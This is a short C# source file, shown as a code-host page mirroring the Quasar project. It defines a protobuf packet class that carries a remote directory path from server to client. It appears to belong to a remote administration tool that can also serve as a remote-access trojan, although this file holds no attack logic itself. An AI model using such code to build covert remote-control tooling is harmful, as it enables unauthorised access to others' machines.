mirror of https://github.com/quasar/Quasar.git
25 lines
470 B
C#
25 lines
470 B
C#
using ProtoBuf;
|
|
|
|
namespace xClient.Core.Packets.ServerPackets
|
|
{
|
|
[ProtoContract]
|
|
public class Directory : IPacket
|
|
{
|
|
[ProtoMember(1)]
|
|
public string RemotePath { get; set; }
|
|
|
|
public Directory()
|
|
{
|
|
}
|
|
|
|
public Directory(string remotepath)
|
|
{
|
|
this.RemotePath = remotepath;
|
|
}
|
|
|
|
public void Execute(Client client)
|
|
{
|
|
client.Send<Directory>(this);
|
|
}
|
|
}
|
|
} |